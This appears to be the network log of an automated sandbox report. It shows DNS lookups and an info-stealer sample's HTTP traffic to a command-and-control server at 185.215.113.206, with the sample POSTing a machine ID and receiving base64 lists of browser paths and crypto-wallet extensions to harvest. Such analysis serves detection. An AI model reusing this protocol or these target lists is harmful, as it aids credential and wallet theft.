Nov 22, 2024 20:37:09.611119032 CET	1.1.1.1	192.168.2.4	0x55a1	No error (0)	telemetry-incoming.r53-2.services.mozilla.com		34.120.208.123	A (IP address)	IN (0x0001)	false
Nov 22, 2024 20:37:09.759354115 CET	1.1.1.1	192.168.2.4	0xe05f	No error (0)	telemetry-incoming.r53-2.services.mozilla.com		34.120.208.123	A (IP address)	IN (0x0001)	false
Nov 22, 2024 20:37:10.081947088 CET	1.1.1.1	192.168.2.4	0x2d8e	No error (0)	telemetry-incoming.r53-2.services.mozilla.com		34.120.208.123	A (IP address)	IN (0x0001)	false
Nov 22, 2024 20:37:11.685307980 CET	1.1.1.1	192.168.2.4	0xeac5	No error (0)	support.mozilla.org	prod.sumo.prod.webservices.mozgcp.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 22, 2024 20:37:11.685307980 CET	1.1.1.1	192.168.2.4	0xeac5	No error (0)	prod.sumo.prod.webservices.mozgcp.net	us-west1.prod.sumo.prod.webservices.mozgcp.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 22, 2024 20:37:11.685307980 CET	1.1.1.1	192.168.2.4	0xeac5	No error (0)	us-west1.prod.sumo.prod.webservices.mozgcp.net		34.149.128.2	A (IP address)	IN (0x0001)	false
Nov 22, 2024 20:37:11.826077938 CET	1.1.1.1	192.168.2.4	0xb6d5	No error (0)	us-west1.prod.sumo.prod.webservices.mozgcp.net		34.149.128.2	A (IP address)	IN (0x0001)	false
Nov 22, 2024 20:37:12.251189947 CET	1.1.1.1	192.168.2.4	0xba2d	No error (0)	www.youtube.com	youtube-ui.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 22, 2024 20:37:12.251189947 CET	1.1.1.1	192.168.2.4	0xba2d	No error (0)	youtube-ui.l.google.com		172.217.19.206	A (IP address)	IN (0x0001)	false
Nov 22, 2024 20:37:12.251189947 CET	1.1.1.1	192.168.2.4	0xba2d	No error (0)	youtube-ui.l.google.com		172.217.19.14	A (IP address)	IN (0x0001)	false
Nov 22, 2024 20:37:12.251189947 CET	1.1.1.1	192.168.2.4	0xba2d	No error (0)	youtube-ui.l.google.com		172.217.19.174	A (IP address)	IN (0x0001)	false
Nov 22, 2024 20:37:12.251189947 CET	1.1.1.1	192.168.2.4	0xba2d	No error (0)	youtube-ui.l.google.com		172.217.19.238	A (IP address)	IN (0x0001)	false
Nov 22, 2024 20:37:12.251189947 CET	1.1.1.1	192.168.2.4	0xba2d	No error (0)	youtube-ui.l.google.com		142.250.181.14	A (IP address)	IN (0x0001)	false
Nov 22, 2024 20:37:12.251189947 CET	1.1.1.1	192.168.2.4	0xba2d	No error (0)	youtube-ui.l.google.com		142.250.181.78	A (IP address)	IN (0x0001)	false
Nov 22, 2024 20:37:12.251189947 CET	1.1.1.1	192.168.2.4	0xba2d	No error (0)	youtube-ui.l.google.com		142.250.181.110	A (IP address)	IN (0x0001)	false
Nov 22, 2024 20:37:12.251189947 CET	1.1.1.1	192.168.2.4	0xba2d	No error (0)	youtube-ui.l.google.com		172.217.17.78	A (IP address)	IN (0x0001)	false
Nov 22, 2024 20:37:12.251189947 CET	1.1.1.1	192.168.2.4	0xba2d	No error (0)	youtube-ui.l.google.com		172.217.17.46	A (IP address)	IN (0x0001)	false
Nov 22, 2024 20:37:12.251189947 CET	1.1.1.1	192.168.2.4	0xba2d	No error (0)	youtube-ui.l.google.com		142.250.181.142	A (IP address)	IN (0x0001)	false
Nov 22, 2024 20:37:12.251189947 CET	1.1.1.1	192.168.2.4	0xba2d	No error (0)	youtube-ui.l.google.com		172.217.21.46	A (IP address)	IN (0x0001)	false
Nov 22, 2024 20:37:12.251884937 CET	1.1.1.1	192.168.2.4	0x1c8a	No error (0)	www.facebook.com	star-mini.c10r.facebook.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 22, 2024 20:37:12.251884937 CET	1.1.1.1	192.168.2.4	0x1c8a	No error (0)	star-mini.c10r.facebook.com		157.240.196.35	A (IP address)	IN (0x0001)	false
Nov 22, 2024 20:37:12.471446037 CET	1.1.1.1	192.168.2.4	0x252f	No error (0)	youtube-ui.l.google.com		172.217.19.206	A (IP address)	IN (0x0001)	false
Nov 22, 2024 20:37:12.471446037 CET	1.1.1.1	192.168.2.4	0x252f	No error (0)	youtube-ui.l.google.com		172.217.19.14	A (IP address)	IN (0x0001)	false
Nov 22, 2024 20:37:12.471446037 CET	1.1.1.1	192.168.2.4	0x252f	No error (0)	youtube-ui.l.google.com		172.217.19.174	A (IP address)	IN (0x0001)	false
Nov 22, 2024 20:37:12.471446037 CET	1.1.1.1	192.168.2.4	0x252f	No error (0)	youtube-ui.l.google.com		172.217.19.238	A (IP address)	IN (0x0001)	false
Nov 22, 2024 20:37:12.471446037 CET	1.1.1.1	192.168.2.4	0x252f	No error (0)	youtube-ui.l.google.com		142.250.181.14	A (IP address)	IN (0x0001)	false
Nov 22, 2024 20:37:12.471446037 CET	1.1.1.1	192.168.2.4	0x252f	No error (0)	youtube-ui.l.google.com		142.250.181.78	A (IP address)	IN (0x0001)	false
Nov 22, 2024 20:37:12.471446037 CET	1.1.1.1	192.168.2.4	0x252f	No error (0)	youtube-ui.l.google.com		142.250.181.110	A (IP address)	IN (0x0001)	false
Nov 22, 2024 20:37:12.471446037 CET	1.1.1.1	192.168.2.4	0x252f	No error (0)	youtube-ui.l.google.com		172.217.17.78	A (IP address)	IN (0x0001)	false
Nov 22, 2024 20:37:12.471446037 CET	1.1.1.1	192.168.2.4	0x252f	No error (0)	youtube-ui.l.google.com		172.217.17.46	A (IP address)	IN (0x0001)	false
Nov 22, 2024 20:37:12.471446037 CET	1.1.1.1	192.168.2.4	0x252f	No error (0)	youtube-ui.l.google.com		142.250.181.142	A (IP address)	IN (0x0001)	false
Nov 22, 2024 20:37:12.471446037 CET	1.1.1.1	192.168.2.4	0x252f	No error (0)	youtube-ui.l.google.com		172.217.21.46	A (IP address)	IN (0x0001)	false
Nov 22, 2024 20:37:12.472428083 CET	1.1.1.1	192.168.2.4	0x5246	No error (0)	star-mini.c10r.facebook.com		157.240.196.35	A (IP address)	IN (0x0001)	false
Nov 22, 2024 20:37:12.472445965 CET	1.1.1.1	192.168.2.4	0xf73	No error (0)	telemetry-incoming.r53-2.services.mozilla.com		34.120.208.123	A (IP address)	IN (0x0001)	false
Nov 22, 2024 20:37:12.472536087 CET	1.1.1.1	192.168.2.4	0x521a	No error (0)	www.wikipedia.org	dyna.wikimedia.org		CNAME (Canonical name)	IN (0x0001)	false
Nov 22, 2024 20:37:12.472536087 CET	1.1.1.1	192.168.2.4	0x521a	No error (0)	dyna.wikimedia.org		185.15.58.224	A (IP address)	IN (0x0001)	false
Nov 22, 2024 20:37:12.610661983 CET	1.1.1.1	192.168.2.4	0x9df9	No error (0)	youtube-ui.l.google.com			28	IN (0x0001)	false
Nov 22, 2024 20:37:12.610661983 CET	1.1.1.1	192.168.2.4	0x9df9	No error (0)	youtube-ui.l.google.com			28	IN (0x0001)	false
Nov 22, 2024 20:37:12.610661983 CET	1.1.1.1	192.168.2.4	0x9df9	No error (0)	youtube-ui.l.google.com			28	IN (0x0001)	false
Nov 22, 2024 20:37:12.610661983 CET	1.1.1.1	192.168.2.4	0x9df9	No error (0)	youtube-ui.l.google.com			28	IN (0x0001)	false
Nov 22, 2024 20:37:12.610747099 CET	1.1.1.1	192.168.2.4	0xa692	No error (0)	star-mini.c10r.facebook.com			28	IN (0x0001)	false
Nov 22, 2024 20:37:12.614011049 CET	1.1.1.1	192.168.2.4	0x4a30	No error (0)	dyna.wikimedia.org		185.15.58.224	A (IP address)	IN (0x0001)	false
Nov 22, 2024 20:37:12.758785963 CET	1.1.1.1	192.168.2.4	0x4797	No error (0)	www.reddit.com	reddit.map.fastly.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 22, 2024 20:37:12.758785963 CET	1.1.1.1	192.168.2.4	0x4797	No error (0)	reddit.map.fastly.net		151.101.1.140	A (IP address)	IN (0x0001)	false
Nov 22, 2024 20:37:12.758785963 CET	1.1.1.1	192.168.2.4	0x4797	No error (0)	reddit.map.fastly.net		151.101.129.140	A (IP address)	IN (0x0001)	false
Nov 22, 2024 20:37:12.758785963 CET	1.1.1.1	192.168.2.4	0x4797	No error (0)	reddit.map.fastly.net		151.101.65.140	A (IP address)	IN (0x0001)	false
Nov 22, 2024 20:37:12.758785963 CET	1.1.1.1	192.168.2.4	0x4797	No error (0)	reddit.map.fastly.net		151.101.193.140	A (IP address)	IN (0x0001)	false
Nov 22, 2024 20:37:12.759597063 CET	1.1.1.1	192.168.2.4	0x8d12	No error (0)	dyna.wikimedia.org			28	IN (0x0001)	false
Nov 22, 2024 20:37:12.950731039 CET	1.1.1.1	192.168.2.4	0x4e32	No error (0)	twitter.com		104.244.42.1	A (IP address)	IN (0x0001)	false
Nov 22, 2024 20:37:12.953592062 CET	1.1.1.1	192.168.2.4	0x29b4	No error (0)	reddit.map.fastly.net		151.101.1.140	A (IP address)	IN (0x0001)	false
Nov 22, 2024 20:37:12.953592062 CET	1.1.1.1	192.168.2.4	0x29b4	No error (0)	reddit.map.fastly.net		151.101.193.140	A (IP address)	IN (0x0001)	false
Nov 22, 2024 20:37:12.953592062 CET	1.1.1.1	192.168.2.4	0x29b4	No error (0)	reddit.map.fastly.net		151.101.65.140	A (IP address)	IN (0x0001)	false
Nov 22, 2024 20:37:12.953592062 CET	1.1.1.1	192.168.2.4	0x29b4	No error (0)	reddit.map.fastly.net		151.101.129.140	A (IP address)	IN (0x0001)	false
Nov 22, 2024 20:37:13.022105932 CET	1.1.1.1	192.168.2.4	0x4e32	No error (0)	twitter.com		104.244.42.1	A (IP address)	IN (0x0001)	false
Nov 22, 2024 20:37:13.089010954 CET	1.1.1.1	192.168.2.4	0x91e5	No error (0)	twitter.com		104.244.42.1	A (IP address)	IN (0x0001)	false
Nov 22, 2024 20:37:13.089010954 CET	1.1.1.1	192.168.2.4	0x91e5	No error (0)	twitter.com		104.244.42.65	A (IP address)	IN (0x0001)	false
Nov 22, 2024 20:37:13.089010954 CET	1.1.1.1	192.168.2.4	0x91e5	No error (0)	twitter.com		104.244.42.193	A (IP address)	IN (0x0001)	false
Nov 22, 2024 20:37:13.089010954 CET	1.1.1.1	192.168.2.4	0x91e5	No error (0)	twitter.com		104.244.42.129	A (IP address)	IN (0x0001)	false

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	185.215.113.206	80	7540	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 20:35:02.175725937 CET	90	OUT	GET / HTTP/1.1 Host: 185.215.113.206 Connection: Keep-Alive Cache-Control: no-cache
Nov 22, 2024 20:35:03.515705109 CET	203	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:35:03 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 22, 2024 20:35:03.518321991 CET	413	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EBAAFCAFCBKFHJJJKKFH Host: 185.215.113.206 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 45 42 41 41 46 43 41 46 43 42 4b 46 48 4a 4a 4a 4b 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 36 38 37 42 34 42 30 35 45 33 46 33 32 33 35 31 31 34 31 39 39 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 41 46 43 41 46 43 42 4b 46 48 4a 4a 4a 4b 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 41 46 43 41 46 43 42 4b 46 48 4a 4a 4a 4b 4b 46 48 2d 2d 0d 0a Data Ascii: ------EBAAFCAFCBKFHJJJKKFHContent-Disposition: form-data; name="hwid"7687B4B05E3F3235114199------EBAAFCAFCBKFHJJJKKFHContent-Disposition: form-data; name="build"mars------EBAAFCAFCBKFHJJJKKFH--
Nov 22, 2024 20:35:03.968451023 CET	407	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:35:03 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 180 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 59 6d 49 79 59 6a 51 32 59 6a 59 30 5a 54 46 69 4f 57 55 34 4d 6a 59 32 4d 6a 42 6a 4e 32 4d 7a 59 32 51 34 59 57 4d 34 4e 54 63 33 4e 6d 49 33 5a 6a 6b 33 4d 44 49 34 4e 47 55 31 4e 47 59 32 4e 6a 55 79 59 54 56 6d 4d 7a 49 35 5a 47 4d 7a 4e 44 45 78 4f 54 59 78 4d 32 4a 6b 4d 54 41 7a 66 48 64 72 61 32 70 78 59 57 6c 68 65 47 74 6f 59 6e 78 7a 62 57 70 73 62 47 31 35 62 57 78 69 65 6e 45 75 63 48 64 6b 66 44 42 38 4d 48 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 77 66 48 6c 69 62 6d 4e 69 61 48 6c 73 5a 58 42 74 5a 58 77 3d Data Ascii: YmIyYjQ2YjY0ZTFiOWU4MjY2MjBjN2MzY2Q4YWM4NTc3NmI3Zjk3MDI4NGU1NGY2NjUyYTVmMzI5ZGMzNDExOTYxM2JkMTAzfHdra2pxYWlheGtoYnxzbWpsbG15bWxienEucHdkfDB8MHwxfDF8MXwxfDF8MXwwfHlibmNiaHlsZXBtZXw=
Nov 22, 2024 20:35:03.969986916 CET	470	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CAFBGDHCBAEHIDGCGIDA Host: 185.215.113.206 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 43 41 46 42 47 44 48 43 42 41 45 48 49 44 47 43 47 49 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 62 32 62 34 36 62 36 34 65 31 62 39 65 38 32 36 36 32 30 63 37 63 33 63 64 38 61 63 38 35 37 37 36 62 37 66 39 37 30 32 38 34 65 35 34 66 36 36 35 32 61 35 66 33 32 39 64 63 33 34 31 31 39 36 31 33 62 64 31 30 33 0d 0a 2d 2d 2d 2d 2d 2d 43 41 46 42 47 44 48 43 42 41 45 48 49 44 47 43 47 49 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 43 41 46 42 47 44 48 43 42 41 45 48 49 44 47 43 47 49 44 41 2d 2d 0d 0a Data Ascii: ------CAFBGDHCBAEHIDGCGIDAContent-Disposition: form-data; name="token"bb2b46b64e1b9e826620c7c3cd8ac85776b7f970284e54f6652a5f329dc34119613bd103------CAFBGDHCBAEHIDGCGIDAContent-Disposition: form-data; name="message"browsers------CAFBGDHCBAEHIDGCGIDA--
Nov 22, 2024 20:35:04.410852909 CET	1236	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:35:04 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 2028 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 51 7a 70 63 55 48 4a 76 5a 33 4a 68 62 53 42 47 61 57 78 6c 63 31 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 58 45 46 77 63 47 78 70 59 32 46 30 61 57 39 75 58 48 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 49 45 4e 68 62 6d 46 79 65 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 53 42 54 65 46 4e 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 44 42 38 51 32 68 79 62 32 31 70 64 57 31 38 58 45 4e 6f 63 6d 39 74 61 58 56 74 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 77 77 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 4d 48 [TRUNCATED] Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8QzpcUHJvZ3JhbSBGaWxlc1xHb29nbGVcQ2hyb21lXEFwcGxpY2F0aW9uXHxHb29nbGUgQ2hyb21lIENhbmFyeXxcR29vZ2xlXENocm9tZSBTeFNcVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfDB8Q2hyb21pdW18XENocm9taXVtXFVzZXIgRGF0YXxjaHJvbWV8Y2hyb21lLmV4ZXwwfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfDB8MHxUb3JjaHxcVG9yY2hcVXNlciBEYXRhfGNocm9tZXwwfDB8Vml2YWxkaXxcVml2YWxkaVxVc2VyIERhdGF8Y2hyb21lfHZpdmFsZGkuZXhlfCVMT0NBTEFQUERBVEElXFZpdmFsZGlcQXBwbGljYXRpb25cfENvbW9kbyBEcmFnb258XENvbW9kb1xEcmFnb25cVXNlciBEYXRhfGNocm9tZXwwfDB8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGVwaWMuZXhlfCVMT0NBTEFQUERBVEElXEVwaWMgUHJpdmFjeSBCcm93c2VyXEFwcGxpY2F0aW9uXHxDb2NDb2N8XENvY0NvY1xCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8YnJvd3Nlci5leGV8QzpcUHJvZ3JhbSBGaWxlc1xDb2NDb2NcQnJvd3NlclxBcHBsaWNhdGlvblx8QnJhdmV8XEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyYXZlLmV4ZXxDOlxQcm9ncmFtIEZpbGVzXEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxBcHBsaWNhdGlvblx8Q2Vu
Nov 22, 2024 20:35:04.410965919 CET	1020	IN	Data Raw: 64 43 42 43 63 6d 39 33 63 32 56 79 66 46 78 44 5a 57 35 30 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 4a 55 78 50 51 30 46 4d 51 56 42 51 52 45 Data Ascii: dCBCcm93c2VyfFxDZW50QnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8JUxPQ0FMQVBQREFUQSVcQ2VudEJyb3dzZXJcQXBwbGljYXRpb25cfDdTdGFyfFw3U3Rhclw3U3RhclxVc2VyIERhdGF8Y2hyb21lfDB8MHxDaGVkb3QgQnJvd3NlcnxcQ2hlZG90XFVzZXIgRGF0YXxjaHJvbWV8MHwwfE1pY3Jvc29
Nov 22, 2024 20:35:04.412189960 CET	469	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FCBFBGDBKJKECAAKKFHD Host: 185.215.113.206 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 46 43 42 46 42 47 44 42 4b 4a 4b 45 43 41 41 4b 4b 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 62 32 62 34 36 62 36 34 65 31 62 39 65 38 32 36 36 32 30 63 37 63 33 63 64 38 61 63 38 35 37 37 36 62 37 66 39 37 30 32 38 34 65 35 34 66 36 36 35 32 61 35 66 33 32 39 64 63 33 34 31 31 39 36 31 33 62 64 31 30 33 0d 0a 2d 2d 2d 2d 2d 2d 46 43 42 46 42 47 44 42 4b 4a 4b 45 43 41 41 4b 4b 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 46 43 42 46 42 47 44 42 4b 4a 4b 45 43 41 41 4b 4b 46 48 44 2d 2d 0d 0a Data Ascii: ------FCBFBGDBKJKECAAKKFHDContent-Disposition: form-data; name="token"bb2b46b64e1b9e826620c7c3cd8ac85776b7f970284e54f6652a5f329dc34119613bd103------FCBFBGDBKJKECAAKKFHDContent-Disposition: form-data; name="message"plugins------FCBFBGDBKJKECAAKKFHD--
Nov 22, 2024 20:35:04.855616093 CET	1236	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:35:04 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 7116 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d [TRUNCATED] Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5
Nov 22, 2024 20:35:04.855650902 CET	1236	IN	Data Raw: 49 46 64 68 62 47 78 6c 64 48 78 72 63 47 5a 76 63 47 74 6c 62 47 31 68 63 47 4e 76 61 58 42 6c 62 57 5a 6c 62 6d 52 74 5a 47 4e 6e 61 47 35 6c 5a 32 6c 74 62 6e 77 78 66 44 42 38 4d 48 78 55 5a 58 4a 79 59 53 42 54 64 47 46 30 61 57 39 75 49 46 Data Ascii: IFdhbGxldHxrcGZvcGtlbG1hcGNvaXBlbWZlbmRtZGNnaG5lZ2ltbnwxfDB8MHxUZXJyYSBTdGF0aW9uIFdhbGxldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9na2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdkb2NtY2JtZmlrZGNvZ29
Nov 22, 2024 20:35:04.855668068 CET	1236	IN	Data Raw: 66 47 52 75 5a 32 31 73 59 6d 78 6a 62 32 52 6d 62 32 4a 77 5a 48 42 6c 59 32 46 68 5a 47 64 6d 59 6d 4e 6e 5a 32 5a 71 5a 6d 35 74 66 44 46 38 4d 48 77 77 66 45 74 6c 5a 58 42 6c 63 69 42 58 59 57 78 73 5a 58 52 38 62 48 42 70 62 47 4a 75 61 57 Data Ascii: fGRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdmYmNnZ2ZqZm5tfDF8MHwwfEtlZXBlciBXYWxsZXR8bHBpbGJuaWlhYmFja2RqY2lvbmtvYmdsbWRkZmJjam98MXwwfDB8U29sZmxhcmUgV2FsbGV0fGJoaGhsYmVwZGtiYXBhZGpkbm5vamtiZ2lvaW9kYmljfDF8MHwwfEN5YW5vIFdhbGxldHxka2RlZGxwZ2RtbWtrZmphYmZmZWd
Nov 22, 2024 20:35:04.855778933 CET	1236	IN	Data Raw: 49 45 46 77 64 47 39 7a 49 46 64 68 62 47 78 6c 64 48 78 77 61 47 74 69 59 57 31 6c 5a 6d 6c 75 5a 32 64 74 59 57 74 6e 61 32 78 77 61 32 78 71 61 6d 31 6e 61 57 4a 76 61 47 35 69 59 58 77 78 66 44 42 38 4d 48 78 51 5a 58 52 79 59 53 42 42 63 48 Data Ascii: IEFwdG9zIFdhbGxldHxwaGtiYW1lZmluZ2dtYWtna2xwa2xqam1naWJvaG5iYXwxfDB8MHxQZXRyYSBBcHRvcyBXYWxsZXR8ZWpqbGFkaW5uY2tkZ2plbWVrZWJkcGVva2Jpa2hmY2l8MXwwfDB8TWFydGlhbiBBcHRvcyBXYWxsZXR8ZWZiZ2xnb2ZvaXBwYmdjamVwbmhpYmxhaWJjbmNsZ2t8MXwwfDB8RmlubmllfGNqbWt
Nov 22, 2024 20:35:04.855822086 CET	1236	IN	Data Raw: 59 57 5a 6a 61 48 77 78 66 44 42 38 4d 48 78 4e 57 55 74 4a 66 47 4a 74 61 57 74 77 5a 32 39 6b 63 47 74 6a 62 47 35 72 5a 32 31 75 63 48 42 6f 5a 57 68 6b 5a 32 4e 70 62 57 31 70 5a 47 56 6b 66 44 46 38 4d 48 77 77 66 46 4e 77 62 47 6c 72 61 58 Data Ascii: YWZjaHwxfDB8MHxNWUtJfGJtaWtwZ29kcGtjbG5rZ21ucHBoZWhkZ2NpbW1pZGVkfDF8MHwwfFNwbGlraXR5fGpoZmpmY2xlcGFjb2xkbWpta21kbG1nYW5mYWFsa2xifDF8MHwwfENvbW1vbktleXxjaGdmZWZqcGNvYmZibnBtaW9rZmpqYWdsYWhtbmRlZHwxfDB8MHxab2hvIFZhdWx0fGlna3Bjb2RoaWVvbXBlbG9uY2Z
